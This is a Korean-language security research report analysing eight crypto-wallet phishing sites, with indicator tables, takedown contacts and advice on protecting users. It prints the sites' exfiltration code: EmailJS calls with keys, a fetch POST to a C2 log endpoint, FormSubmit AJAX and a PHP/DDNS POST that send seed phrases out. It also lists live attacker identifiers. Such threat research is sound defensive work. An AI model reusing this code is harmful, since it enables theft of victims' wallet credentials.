뉴스로 돌아가기
심층 조사

암호화폐 피싱의 실체:
실제 공격 사례 8가지 분석

우리는 실시간으로 피싱 트래픽을 차단하고, 시드 문구 탈취 도구 5개를 리버스 엔지니어링했으며, 탈취된 데이터의 출처를 Telegram 봇, EmailJS 계정, 그리고 피싱-어-서비스(Phishing-as-a-Service) 백엔드까지 추적해 냈습니다.

2026년 3월 27일 PhishDestroy 연구 읽는 데 18분 소요
암호화폐 피싱 사건 조사 과정 분석
차단된 피싱 트래픽에 대한 실시간 분석을 통해 공격 인프라의 전모가 드러났다
8분석 대상 사이트
7정보 유출 방법
1,824+도용된 인증 정보
380+지갑 브랜드
$0공격자 비용

우리가 발견한 것

매일 수천 명의 암호화폐 사용자들이 정식 지갑 서비스와 구별할 수 없을 정도로 유사한 피싱 사이트로 인해 자금을 잃고 있습니다. 그런데 과연 어떤 일이 벌어지는 걸까요? 뒤에 가짜 “Connect Wallet” 버튼인가요? 시드 문구는 실제로 어디로 저장되나요?

우리는 활동 중인 5개의 피싱 사이트에서 실시간 HTTP 트래픽을 가로채고, 해당 사이트의 전체 소스 코드를 다운로드한 뒤, 모든 데이터 유출 엔드포인트의 최종 목적지까지 추적했습니다. 이번 조사를 통해 시드 문구를 입력하도록 유도하는 사회공학적 기법부터, 이를 공격자에게 실시간으로 전달하는 Telegram 봇에 이르기까지, 현대식 암호화폐 피싱의 전체적인 구조를 밝혀냈습니다.

면책 조항

이 기사에 소개된 모든 시드 문구는 무작위로 생성된 테스트 데이터입니다. 이번 조사 과정에서 실제 인증 정보가 유출된 적은 없습니다. 모든 사이트는 해당 호스팅 업체 및 악용 신고 담당 부서에 신고되었습니다.

보편적인 공격 패턴

브랜드와 백엔드가 서로 다르지만, 8개의 피싱 사이트 모두 다음을 따르고 있습니다. 완전히 똑같은 심리적 퍼널:

랜딩 페이지신뢰 구축
지갑 선택기60–110개 이상의 로고
가짜 “연결 중...”3~5초 타이머
"연결 실패"항상 실패한다
수동 입력시드 / 키 / 키스토어
정보 유출TG / 이메일 / API

핵심적인 통찰: “연결 중...” 애니메이션은 항상 실패하도록 고정되어 있음. 사이트 #4의 소스 코드에서 우리는 다음을 발견했습니다. const success = false — 지갑 연결 시도는 전혀 없습니다. 이 전체 흐름은 오로지 피해자들을 “수동 연결” 양식으로 유도하기 위한 것일 뿐입니다.

6단계로 이루어진 암호화폐 피싱 공격 체인
우리가 분석한 모든 피싱 사이트에서 공통적으로 나타나는 6단계의 보편적인 공격 흐름

8개 사이트: 상세 분석

1
네트워크 계층 프로토콜
networklayers.pages.dev
라이브Cloudflare PagesTelegram 봇 + EmailJS

사칭

지갑 검증을 위한 가상의 “분산형 프로토콜”입니다. 신뢰성을 높이기 위해 CryptoCompare의 실시간 가격 티커를 사용하고, 실제 블록체인 탐색기(이더리움, BSC, 폴리곤, 아발란치, 솔라나, 카르다노)로 연결되는 링크를 제공합니다. 랜딩 페이지에는 100개 이상의 지갑 로고와 3단계로 구성된 “검증” 절차가 소개되어 있습니다.

이중 유출 경로

5개 중 가장 정교한 백엔드 — 도난당한 모든 인증 정보는 이곳을 통해 전송됩니다 두 개의 독립적인 채널 동시에:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINT 분석 결과

지표
사기 이메일Bestgrace309@gmail.com
Telegram 봇@DewdropsTG_bot (ID: 7567323692)
Telegram 수신자@metatech2 (채팅 ID: 7350941887)
백엔드emailjs-backend-ovtg.onrender.com
EmailJS 서비스service_d5qigxs / template_7bqxeaa
숨겨진 영역layerschain.in (CF 이메일 난독화에서 발췌)
보낸 메시지1,824+ (Telegram message_id 기준)
도메인 등록 기간2일 (TLS: 2026년 3월 25일)
OPSEC 실패

공격자의 이메일은 다음에서 발견되었습니다. 자바스크립트 주석 안쪽 config.js: // Bestgrace309@gmail.com. 배포하기 전에 이를 제거하는 것을 깜빡했습니다. 게다가 Telegram 중계 백엔드는 완전히 개방되어 있어 — 인증도 없고, 전송 속도 제한도 없습니다. Cloudflare의 data-cfemail HTML 내의 난독화 처리 과정에서, 우리는 숨겨진 이메일 주소도 발견했습니다: support@layerschain.in, 인도와 남아프리카공화국의 호스팅 인프라와 연결되어 있습니다.

2
AQLA 토큰 이전
token-aqla.pages.dev
라이브Cloudflare Pages비정적 양식

사칭

현실을 픽셀 단위로 완벽하게 재현한 스크래핑 아쿠알리브레 (AQLA) 토큰 마이그레이션 페이지. 이 HTML에는 출처를 나타내는 메타데이터 태그가 포함되어 있습니다: data-scrapbook-source="https://token.aqla.app/migration", 2024년 11월 19일자.

제로 코드 접근 방식

이 공격자는 다음이 필요합니다. 서버 측 코드가 전혀 없음. 이 양식은 다음으로 직접 전송됩니다. 비정적 — 정적 사이트를 위한 합법적인 양식 백엔드입니다. 모든 제출 내용은 사기꾼의 이메일로 전달됩니다. 공격자의 이메일 주소는 소스 코드에서는 절대 보이지 않음.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
가격: $0

Cloudflare Pages: 무료. Un-static Forms: 무료. 도메인 구매 없음. 서버 임대 없음. 총 인프라 비용: 0달러.

3
SafePal 타이포스쿼트
antiresolve-mysafpalnode.pages.dev
라이브 Cloudflare Pages 비정적 양식

사칭

이 하위 도메인에는 "가 포함되어 있습니다.safpal" — a 의도적으로 틀리게 쓴 SafePal, 인기 있는 하드웨어 지갑입니다. 이 사이트는 “블록체인 지갑 정정”을 사칭하며 26개의 가짜 문제 카테고리를 제시합니다. Typed.js를 사용하여 체인 이름(이더리움, BSC, 폴리곤 등)에 애니메이션을 적용하고, 신뢰도를 높이기 위해 LiveCoinWatch 티커를 활용합니다.

같은 장비, 같은 조작자?

다음 기능을 사용합니다. 완전히 똑같은 피싱 템플릿 사이트 #2와 마찬가지로: 동일함 connect.html, 동일 wallets.html 60개 이상의 로고가 있으며, 동일한 Un-static 백엔드를 사용합니다(폼 ID는 다름 — 6f1b82c3...da9943af). 동일한 키트가 다음과 같은 사실을 강력히 시사한다 한 명의 운영자가 두 사이트를 모두 운영함.

코드 내 오류: “Privay Policy”(‘c’가 빠짐), “seperated”(“separated”로 수정해야 함), “Kestore”(‘y’가 빠짐). 비밀번호 입력란은 type="text" 대신 type="password".

4
플레어 네트워크 클론
flaremainnet.pages.dev
라이브Cloudflare Pages이중 EmailJS (중복 구성)

사칭

의 거의 완벽한 복제품인 플레어 네트워크 portal — FTSO 및 Data Connector 프로토콜을 갖춘 진정한 레이어 1 EVM 블록체인입니다. 30개 이상의 생태계 파트너, 내비게이션, 브랜딩을 복제합니다. 타이포스쿼트 도메인에서 로드된 파비콘: portal.flaremainet.com (“mainnet”에서 ‘n’이 하나 빠졌습니다).

이메일JS 이중화

다음 중 유일하게 사용하는 사이트는 두 개의 별도 EmailJS 계정을 동시에 내림 방지용 중복성을 위해:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

모든 절도 사건에 대한 이메일 제목: "New Wallet Details from Flare".

이 사업은 자금 지원을 받고 있습니다

HTML에는 다음 내용이 포함되어 있습니다. Google 태그 매니저 (GTM-WX2D2TR), 마이크로소프트 클라리티 (j4bllybjkp), Lunio PPC 보호 기능, 그리고 한 Twitter/X 광고 픽셀. 공격자는 다음을 실행 중입니다. 유료 광고 피해자들을 피싱 사이트로 유도하고 봇의 클릭을 걸러내기 위해서입니다. 이는 단순한 취미가 아니라, 분석 도구와 광고 예산을 투입한 조직적인 활동입니다.

EmailJS와 유료 광고를 병행하는 Flare Network 피싱 사이트
사이트 #4: 유료 광고, 분석 추적, 이중 정보 유출 — 가장 전문적인 작전
5
COIN NODE / 지갑 수정 (PhaaS)
swiftauthapps.pages.dev
백엔드 다운PulseResolve API (PhaaS)

사칭

일반적인 “COIN NODE” / “Wallet Fix” 서비스(특정 브랜드 없음). 저작권 “Wallet Fix 2022” — 이 키트 템플릿은 최소 4년 전의 것입니다. 이미지는 다음 사이트에 호스팅되어 있습니다. pumpeth.com (AWS 기반 워드프레스).

서비스형 피싱(Phishing-as-a-Service)

가장 우려스러운 백엔드 아키텍처: a UUID 기반 멀티 테넌트 API:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

각 사기꾼에게는 고유한 UUID 엔드포인트가 할당됩니다. 중앙 운영자는 API를 관리하고 캠페인을 추적하며, 경우에 따라 탈취된 자금의 일부를 챙기기도 합니다. 이것이 바로 조직화된 암호화폐 절도 — 피싱-어-서비스(Phishing-as-a-Service) 모델.

관련 인프라 (대부분 비활성화됨)

도메인역할상태
api.pulseresolve.com데이터 유출 APINXDOMAIN
walletissuesfix.net파비콘 호스팅NXDOMAIN
syncwallet.online로고 호스트NXDOMAIN
pumpeth.com이미지 CDN실시간 (AWS)
좀비 프론트엔드

백엔드는 작동하지 않지만, 프론트엔드는 여전히 가동 중입니다 Cloudflare Pages에서. 공격자가 다시 등록할 경우 pulseresolve.com, 그러면 사이트가 즉시 다시 정상적으로 작동하게 됩니다.

6
지원 센터 + 원장 복구
wallet-support-39n.pages.dev 및 ledger-recovery.support
라이브Cloudflare Pages + Replit사용자 정의 C2 APIBIP39 자동 완성

사칭

A 양면 작전: 다음 위치에 있는 일반적인 “지원 센터” wallet-support-39n.pages.dev 15개의 가짜 발행 카테고리와 39개의 지갑 브랜드, 그리고 픽셀 단위로 완벽하게 재현된 Ledger 온보딩 클론 에서 ledger-recovery.support Replit에서 호스팅되며, 기기 모델 선택, PIN 설정, 그리고 24단어 시드 문구 표가 포함되어 있습니다. 진정한 BIP39 자동 완성.

스캐너 방지 C2 백엔드

지갑 지원 페이지에서는 도난당한 데이터를 다음 주소로 전송합니다. api.uranustoken.org/log — Cloudflare 뒤에 배치된 맞춤형 nginx/Ubuntu C2. 백엔드 모든 GET 요청을 의도적으로 차단합니다 (522 타임아웃 오류 반환), POST 요청에만 응답합니다. 즉, URL 스캐너, Google Safe Browsing 크롤러, 그리고 GET 요청으로 해당 엔드포인트에 접속을 시도하는 보안 연구원들은 아무런 정보도 확인할 수 없으며, C2는 비활성화된 것처럼 보입니다.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

이 Ledger 클론은 Replit 내에서 별도의 Express.js 백엔드를 실행합니다: POST /api/recovery-phrase 수집 {deviceId, pin, phrase}. 다음을 반환합니다. 400 {"error":"Invalid data provided"} 잘못된 형식의 입력 시 — 백엔드가 실시간으로 활발히 검증 중 도난당한 데이터.

OSINT 분석 결과

지표
프론트엔드 (지갑)wallet-support-39n.pages.dev
프론트엔드 (Ledger)ledger-recovery.support (34.111.179.208)
C2 백엔드 api.uranustoken.org → nginx/1.24.0 Ubuntu
C2 IP 주소104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit 검증a43d3852-5304-47af-a61b-f0f6f3912736
등록 담당자Name.com (ledger-recovery.support)
배포됨2026년 1월 9일 (Last-Modified 헤더)
기술 스택 React + Vite + Tailwind v4.1 + Framer Motion
최고 수준의 UX 충실도

466 KB 크기의 JS 번들에는 다음이 포함되어 있습니다. 전체 BIP39 단어 목록 실시간 자동 완성 기능에서 “패스프레이즈”는 67회, “니모닉”은 39회 언급되었습니다. 이 레저(Ledger) 복제본은 피해자들에게 실제 레저 기기와 완전히 동일한 초기 설정 절차를 안내하는데, 이는 이번 조사 전체에서 가장 설득력 있는 피싱 페이지입니다. 이 apiKey 구성 파일의 해당 필드는 다음을 시사합니다. 다중 테넌트 PaaS 아키텍처.

7
분산형 런치패드
mainnetvalidationapp.pages.dev
라이브Cloudflare PagesFormSubmit.co

사칭

다음과 같은 기능을 갖춘 일반적인 “분산형 런치패드” 21가지 미끼 종류 (스테이킹, 마이그레이션, KYC, 경품 행사, 보상 수령, 자산 복구, 프리세일, NFT 발행, 계정 잠금...) 및 70개 이상의 지갑 브랜드 — 우리가 접한 것 중 가장 포괄적인 지갑 목록 중 하나다. ‘Sychronize’(‘n’이 빠진)라는 눈에 띄는 오타가 이 목록이 가짜임을 드러낸다.

FormSubmit Pipeline

용도 FormSubmit.co — 합법적인 양식-이메일 전송 서비스. 엔드포인트 해시 a2cf4131f1a5d39453c7c183df96f86f 이는 사기꾼의 이메일 주소에 대한 MD5 해시값입니다. 저희는 Gmail, Yahoo, Hotmail, ProtonMail, Yandex, Mail.ru 등에서 수백 가지의 이메일 패턴을 무차별 대입 공격으로 시도해 보았습니다 — 일치하는 항목 없음. 사기꾼은 흔하지 않거나 무작위로 생성된 이메일 주소를 사용합니다.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINT 분석 결과

지표
도메인mainnetvalidationapp.pages.dev
양식 제출 해시a2cf4131f1a5d39453c7c183df96f86f
캠페인 IDDAPP 탈중앙화
FontAwesome 키트bdc3291137 (키트 번호 112310842, 무료 v6.7.2)
jQuery3.2.1과 3.5.1이 동시에 로드됨
부트스트랩CSS 5.2.2 + JS 5.3.0-alpha1 (버전 불일치)
추적용 손잡이 2개

FontAwesome 키트 bdc3291137 — FontAwesome은 이 키트 ID의 소유자를 식별할 수 있습니다. 캠페인 태그 DAPP DECENTRALIZED 동일한 FormSubmit 해시를 사용하는 다른 피싱 사이트에도 나타날 수 있습니다. 시드 문구를 탈취한 후, 가짜 QR 코드와 임의의 7자리 참조 코드 다음 메시지가 표시됩니다. “고유 참조 코드를 가지고 관리자에게 문의하세요.” — 조사 대신 피해자들을 기다리게만 하고 있습니다.

8
가정용 컴퓨터에서 R2 Bucket + PHP 사용하기
pub-519769e9eb634616b1746c2018641d56.r2.dev
죽은Cloudflare R2PHP + DDNS

사칭

알 수 없음 — 프론트엔드와 백엔드 모두 오프라인 상태입니다. 페이로드 구조를 미루어 볼 때, 이는 암호화폐 지갑 시드 문구를 탈취하는 공격이었습니다. 이 Cloudflare R2 공개 버킷 (Pages가 아닌 객체 스토리지)는 잘 기록된 피싱 수단 Netskope에 따르면 5,000개 이상의 악성 페이지가 확인되었으며, 트래픽이 61배 증가한 것으로 보고되었습니다.

스크립트 키디 환경 구성

가장 기본 연산 이 컬렉션에서. 시드 문구가 전송됩니다 한 단어씩 무료 동적 DNS를 통해 연결된 가정용 컴퓨터나 VPS에서 실행 중인 PHP 스크립트로:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINT 분석 결과

지표
프론트엔드 pub-519769e9eb634616b1746c2018641d56.r2.dev [오프라인]
백엔드 mercifuljigga4real123.publicvm.com [NXDOMAIN]
R2 버킷 ID519769e9eb634616b1746c2018641d56
DDNS 제공업체 DNSExit.com / Netdorm, Inc. (오하이오주 신시내티)
DNS NSns10–13.dnsexit.com
사용자 이름mercifuljigga4real123
OSINT 사용자 이름: mercifuljigga4real123

"Merciful" + "jigga"(제이지의 별명) + "4real" + "123" — 힙합 문화에 대한 애정을 드러내는, 매우 개인적인 닉네임이다. 찾을 수 없음 GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, Steam 등 어떤 인덱싱된 플랫폼에서든. Discord, Telegram 또는 게임 플랫폼에서 이 이름이나 이와 유사한 이름으로 활동하고 있을 가능성이 높습니다. 파일 이름은 fuc.php 손잡이의 파격적인 스타일과 잘 어울린다.

시드 문구를 도용하는 7가지 방법

4가지 암호화폐 피싱 데이터 유출 기법 비교
8개의 피싱 사이트에서 사용된 7가지의 서로 다른 정보 유출 아키텍처
방법사이트작동 원리속도비용
Telegram 봇#1 Render.com의 Express.js는 Bot API로 프록시 역할을 합니다. 사기꾼은 인증 정보를 담은 DM을 즉시 받게 됩니다. 실시간$0
EmailJS#1, #4 클라이언트 측 자바스크립트가 EmailJS API로 직접 데이터를 전송하면, 이 데이터는 사기꾼의 이메일로 전달됩니다. 약 1분$0
비정적 양식#2, #3 제출 내용을 이메일을 통해 전달하는 정상적인 양식 서비스로 전송되는 표준 HTML 양식 POST 요청입니다. 약 1분$0
FormSubmit.co#7 jQuery AJAX를 통해 FormSubmit.co로 전송. 이메일 주소는 MD5 해시로 암호화되어 있습니다. 캠페인 태그는 “DAPP DECENTRALIZED”로 지정되었습니다. 약 1분$0
사용자 정의 C2 API#6 React SPA는 Cloudflare 뒤에 있는 nginx/Express API로 요청을 전송합니다. GET 요청을 삭제합니다 (522) 스캐너를 회피하기 위함. POST 요청에만 응답합니다. 실시간월 ~5달러
PHP + DDNS#8 무료 동적 DNS(publicvm.com)를 통해 가정용 컴퓨터에서 실행되는 PHP 스크립트. 시드 문구를 단어 단위로 전송합니다. 실시간$0
PhaaS API#5 UUID 기반 멀티 테넌트 API. 중앙 운영자가 백엔드를 관리하고, 사기꾼들은 엔드포인트를 임대합니다. 실시간알 수 없음

모든 피싱 사이트를 드러내는 7가지 위험 신호

만약 보신다면 어떤 이 중 다음 항목이 있다면 탭을 즉시 닫으세요:

1. “연결 실패”는 항상 거짓이다

정식 지갑 연결은 WalletConnect 프로토콜이나 브라우저 확장 프로그램을 사용합니다. 이러한 연결에서는 시드 문구를 입력하라는 “연결 실패” 오류 메시지가 절대 표시되지 않습니다.

2. 50~110개 이상의 지갑 로고, 한 곳에서 모두 확인

모든 지갑 아이콘은 동일한 양식으로 연결됩니다. 진정한 서비스라면 각 지갑의 실제 SDK를 통합해야 합니다.

3. 제출 후 “오류”가 발생함

제출 후 나타나는 가짜 “503 오류”나 “알 수 없는 오류”는 의도된 것입니다. 사용자의 데이터는 이미 도난당한 상태이며, 이 오류 메시지는 사용자가 다른 지갑을 사용해 다시 시도하도록 유도하기 위한 것입니다.

4. .pages.dev에서 호스팅됨

5개 사이트 모두 Cloudflare Pages 무료 요금제를 악용하고 있습니다. 신원 확인 절차가 필요하지 않습니다. 2025년 Cloudflare Pages를 이용한 피싱 악용 사례가 198% 증가했습니다.

5. 세 개의 탭: 구문 / 개인 키 / 키 저장소

합법적인 서비스 중 이 세 가지 인증 정보 유형을 모두 요구하는 곳은 없습니다. 이 세 개의 탭이 있는 양식은 피싱 키트의 전형적인 특징입니다.

6. 블록체인과의 상호작용 없음

이 사이트들 중 어느 것도 로드되지 않습니다 ethers.js, web3.js, 또는 RPC 호출을 수행할 수도 없습니다. 이들은 dApp인 척하는 순수한 HTML 양식일 뿐입니다.

7. 무비용 인프라

무료 호스팅 + 무료 양식 서비스 + 무료 메시징 = 0달러로 완성되는 완벽한 피싱 작전. 사이트에 실제 도메인이 없다면 의심해 봐야 합니다.

IOC 전체 순위표

보안 팀, 위협 인텔리전스 플랫폼 및 악용 사례 신고 담당자를 위한 안내:

도메인 및 인프라

도메인유형상태
networklayers.pages.dev피싱 프론트엔드라이브
token-aqla.pages.dev피싱 프론트엔드라이브
antiresolve-mysafpalnode.pages.dev피싱 프론트엔드라이브
flaremainnet.pages.dev피싱 프론트엔드라이브
swiftauthapps.pages.dev피싱 프론트엔드라이브
emailjs-backend-ovtg.onrender.comTG 릴레이 백엔드라이브
portal.flaremainet.com타이포스쿼트 자산알 수 없음
layerschain.in관련 도메인DNS 오류
api.pulseresolve.comPhaaS 백엔드NXDOMAIN
walletissuesfix.net자산 호스트NXDOMAIN
syncwallet.online로고 호스트NXDOMAIN
pumpeth.com이미지 CDN실시간 (AWS)
wallet-support-39n.pages.dev피싱 프론트엔드라이브
ledger-recovery.support레저 피싱 (Replit)라이브
api.uranustoken.orgC2 백엔드 (nginx/Ubuntu)라이브
uranustoken.org루트 도메인404
mainnetvalidationapp.pages.dev피싱 프론트엔드라이브
pub-519769e9eb634616b1746c2018641d56.r2.dev피싱 (R2 버킷)오프라인
mercifuljigga4real123.publicvm.comPHP 백엔드 (DDNS)NXDOMAIN

계정 및 식별자

유형사이트
이메일Bestgrace309@gmail.com#1
이메일 (비공개)support@layerschain.in#1
Telegram 봇@DewdropsTG_bot (7567323692)#1
Telegram 사용자@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
비정적 양식c78173e2d991...94c3f76#2
비정적 양식6f1b82c3ce55...da9943af#3
PhaaS UUIDa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
인스턴스 렌더링rndr-id: ed83576e-b1b3-4c82#1
Replit 검증a43d3852-5304-47af-a61b-f0f6f3912736#6
FormSubmit MD5a2cf4131f1a5d39453c7c183df96f86f#7
캠페인 태그DAPP 탈중앙화#7
FontAwesome 키트bdc3291137 (키트 번호 112310842)#7
R2 버킷 ID519769e9eb634616b1746c2018641d56#8
사용자 이름/DDNSmercifuljigga4real123#8

암호화폐 피싱은 어디에 신고해야 하나요?

암호화폐 피싱 사이트를 어디에 신고해야 할까 — 다각적 제거 조치
호스팅, 백엔드 서비스, 메시징 플랫폼을 동시에 표적으로 삼아 제거 속도를 극대화
서비스보고 대상어떻게
Cloudflare.pages.dev 7개 + R2 버킷 1개abuse.cloudflare.com
Google Safe Browsing모든 피싱 URL피싱 신고하기
PhishTank커뮤니티 차단 목록의 모든 URLphishtank.org
EmailJS악용된 계정 3개 (위의 서비스 ID)abuse@emailjs.com
비정적2가지 형태의 종점un-static.com을 통해 문의하기
Render.comTelegram 중계 백엔드학대 신고 양식 제출
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
구글 (Gmail)Bestgrace309@gmail.comGoogle 신고하기
Twitter/X사이트 #4를 홍보하는 광고 계정X 광고 악용 신고
FormSubmit.co해시 a2cf4131... (#7)FormSubmit 악용 신고 양식
Replitledger-recovery.support (#6)Replit 악용 신고
Name.comledger-recovery.support의 등록 관리자Name.com 악용
DNSExitmercifuljigga4real123.publicvm.comdnsexit.com 악용
FontAwesome키트 bdc3291137 (#7)FontAwesome의 남용
Chainabuse모든 피싱 캠페인Chainabuse.com

자신을 보호하는 방법

황금률

정당한 서비스라면 어떤 경우에도 웹사이트에 시드 문구를 입력하라고 요구하지 않습니다. 시드 문구는 오직 지갑 복구 과정에서만 공식 지갑 소프트웨어에 입력해야 하며, 제3자가 운영하는 “검증”, “동기화” 또는 “복구” 웹사이트에서는 절대로 입력해서는 안 됩니다.

지갑을 연결하기 전에:

  • URL이 공식 도메인과 일치하는지 확인하십시오. SSL 인증서 세부 정보를 확인하십시오.
  • 정식 WalletConnect는 QR 코드나 딥 링크를 사용하며, 시드 문구 양식을 절대 사용하지 않습니다.
  • “연결 실패” 메시지가 표시되고 자격 증명을 수동으로 입력하라는 요청이 나온다면, 이는 피싱입니다.
  • 의심스러운 URL은 다음에서 확인하세요 PhishTank 또는 VirusTotal 상호작용을 시작하기 전에.
  • 하드웨어 지갑을 사용하세요. 이 지갑은 모든 거래마다 물리적 확인 절차가 필요합니다.
  • 공식 URL을 즐겨찾기에 추가하세요. 광고, DM 또는 소셜 미디어에 있는 링크는 절대로 클릭하지 마세요.

암호화폐 피싱 분류 체계

시드 문구 탈취는 그 중 한 가지 유형에 불과합니다. 다음은 암호화폐 피싱의 전체적인 현황입니다. 각 유형에 대한 심층 분석도 추후 추가할 예정입니다.

시드 문구 도용자
사용자가 복구 문구를 입력하도록 속이는 가짜 “Connect Wallet” 페이지. 이 기사의 핵심 — 5가지 실제 사례를 심층 분석합니다.
앞서 다룬 내용
승인 탈취
MetaMask를 통해 무제한 토큰 승인 권한을 요청하는 악성 dApp입니다. 일단 승인되면, 공격자는 사용자의 시드 문구 없이도 지갑 자금을 모두 빼내갑니다.
곧 공개됩니다
아이스 피싱 (Permit2)
EIP-2612의 ‘가스 없는 승인’ 기능을 악용합니다. 피해자는 토큰 전송 권한을 부여하는 오프체인 메시지에 서명하게 되며, 자금이 유출될 때까지 온체인 승인 내역은 확인되지 않습니다.
곧 공개됩니다
가짜 에어드롭 주장
악성 스마트 계약을 통해 “청구”를 요구하는 가짜 토큰 에어드랍. 이 청구 거래는 실제로 사용자의 실제 토큰을 외부로 이체해 버립니다.
곧 공개됩니다
클립보드 하이재커
클립보드를 감시하여, 사용자가 붙여넣기하기 전에 복사된 지갑 주소를 공격자의 주소로 몰래 바꿔치는 악성코드입니다.
곧 공개됩니다
먼지 제거 + 중독
유사한 주소에서 이루어지는 소액 거래들이 거래 내역을 어지럽힙니다. 피해자는 다음 송금을 위해 거래 내역에서 가짜 주소를 복사합니다.
곧 공개됩니다

불편한 진실

암호화폐 피싱 작전을 준비하는 데 드는 비용은 $0 그리고 걸리는 시간은 30분 미만. 무료 호스팅, 무료 양식 서비스, 무료 메시징 봇. 사이트 #1의 배후에 있는 공격자는 이미 다음에서 인증 정보를 탈취했으며 1,824명 이상의 피해자. 4번 사이트가 가동 중입니다 유료 광고 규모에 맞춰. 이건 아마추어들이나 하는 일이 아니라, 하나의 산업입니다. 유일한 방어책은 경각심을 갖는 것뿐입니다.

우리와 함께 맞서 싸워 주세요

PhishDestroy는 암호화폐 피싱 사이트를 실시간으로 추적하고 신고합니다. 의심스러운 사이트를 발견하셨다면 저희에게 신고해 주세요. 저희가 조사하여 해당 사이트가 폐쇄되도록 조치하겠습니다.

관련 조사

조사
xmrwallet.com의 종말: NameSilo는 M 도둑을 보호하기 위해 거짓말을 했다
10년에 걸친 모네로 도난 사건. 3곳의 등록 기관이 연루되었다. NameSilo는 7가지 거짓말을 꾸며냈다.
심층 분석
암호화폐 탈취 네트워크: 드러난 인프라
‘드레이너-어-서비스(drainer-as-a-service)’ 운영 방식이 인프라와 운영 인력을 어떻게 공유하는지.
패널 노출
트러스트 월렛 피싱 패널: 전체 관리자 권한
우리는 트러스트 월렛 피싱 공격의 관리자 패널에 접속했습니다.
인프라
사기 인프라의 실체: 공유 백엔드
사기 조직들이 서버, 템플릿, 결제 흐름을 어떻게 공유하는지.

이 조사 결과 공유하기

X / Twitter Telegram 레딧 LinkedIn

관련 조사

트러스트 월렛 피싱 사건: 23만 9천 달러 탈취, 가담자 6명
심층 취재
트러스트 월렛 피싱 사건: 23만 9천 달러 탈취, 가담자 6명
암호화폐 탈취 툴킷: ‘엔젤 드레이너’ 재판매업자 실체 밝혀져
심층 취재
암호화폐 탈취 툴킷: ‘엔젤 드레이너’ 재판매업자 실체 밝혀져
사기꾼들의 실체: 4가지 사기 백엔드 분석
조사
사기꾼들의 실체: 4가지 사기 백엔드 분석